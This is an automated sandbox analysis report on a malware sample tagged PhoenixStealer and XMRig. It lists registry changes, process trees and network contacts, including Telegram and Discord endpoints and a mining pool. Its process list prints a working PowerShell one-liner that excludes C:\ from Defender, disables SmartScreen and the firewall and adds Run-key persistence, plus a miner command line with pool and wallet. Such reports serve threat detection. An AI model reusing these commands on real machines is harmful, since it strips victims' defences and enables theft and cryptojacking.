Malware Analysis Report

2024-09-22 15:24

Sample ID 220707-jx1v7agabp
Target haha.exe
SHA256 9f2c2e2bcc9acf06fde3c0066db3befe4f89dad3cc66821c1633c5491eb10a5e
Tags
phoenixstealer xmrig evasion miner stealer suricata
score
10/10

Analysis Overview

Threat Level: Known bad

The file haha.exe was found to be: Known bad.

Malicious Activity Summary

xmrig

PhoenixStealer

Suspicious use of NtCreateUserProcessOtherParentProcess

suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil

Modifies security service

XMRig Miner Payload

Downloads MZ/PE file

Modifies Windows Firewall

Executes dropped EXE

Drops startup file

Checks computer location settings

Loads dropped DLL

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Opens file in notepad (likely ransom note)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: LoadsDriver

Suspicious behavior: EnumeratesProcesses

Analysis: static1

Detonation Overview

Reported

2022-07-07 08:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-07-07 08:03

Reported

2022-07-07 08:14

Platform

win7-20220414-en

Max time kernel

501s

Max time network

558s

Command Line

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

PhoenixStealer

stealer phoenixstealer

suricata: ET MALWARE Win32/HunterStealer/AlfonsoStealer/PhoenixStealer CnC Exfil

suricata

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1208 set thread context of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\system32\NOTEPAD.EXE N/A
File created C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Program Files\7-Zip\7zG.exe N/A
File opened for modification C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Program Files\7-Zip\7zG.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\ProgramData\UpSys.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\ProgramData\UpSys.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90d0dd4fd891d801 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 0 N/A C:\ProgramData\UpSys.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\ProgramData\Systemd\procexp.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2044 wrote to memory of 976 N/A C:\Users\Admin\AppData\Local\Temp\haha.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 976 wrote to memory of 1560 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\79571.exe
PID 1560 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
PID 1560 wrote to memory of 20596 N/A C:\Users\Admin\AppData\Local\Temp\79571.exe C:\Users\Admin\AppData\Local\Temp\DllHost.exe
PID 1208 wrote to memory of 213440 N/A C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 20596 wrote to memory of 213512 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 20596 wrote to memory of 213592 N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe C:\ProgramData\Systemd\procexp.exe
PID 213512 wrote to memory of 213972 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\ProgramData\UpSys.exe
PID 213512 wrote to memory of 214008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\netsh.exe
PID 213696 wrote to memory of 2040 N/A C:\ProgramData\UpSys.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\haha.exe

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1

C:\Users\Admin\AppData\Local\Temp\79571.exe

"C:\Users\Admin\AppData\Local\Temp\79571.exe"

C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe

"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"

C:\Users\Admin\AppData\Local\Temp\DllHost.exe

"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)

C:\ProgramData\Systemd\procexp.exe

--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log C:\Windows\Logs\CBS\CbsPersist_20220707080516.cab

C:\ProgramData\UpSys.exe

"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x4e8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CBS.log

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Windows\Logs\CBS\" -an -ai#7zMap20388:102:7zEvent1143

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Windows\Logs\CBS\CbsPersist_20220707080516.log

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
N/A 127.0.0.1:49173 tcp
N/A 127.0.0.1:49180 tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 52.20.78.240:443 api.ipify.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 142.132.131.248:80 pool.hashvault.pro tcp
RU 95.142.46.35:6666 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2022-07-07 08:03

Reported

2022-07-07 08:14

Platform

win10v2004-20220414-en

Max time kernel

608s

Max time network

603s

Command Line

"C:\Users\Admin\AppData\Local\Temp\haha.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 92304 created 67976 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe
PID 92304 created 94360 N/A C:\Windows\system32\svchost.exe C:\ProgramData\UpSys.exe

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\haha.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\ProgramData\UpSys.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\ProgramData\UpSys.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DllHost.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Systemd\procexp.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: 0 N/A C:\ProgramData\UpSys.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\ProgramData\UpSys.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
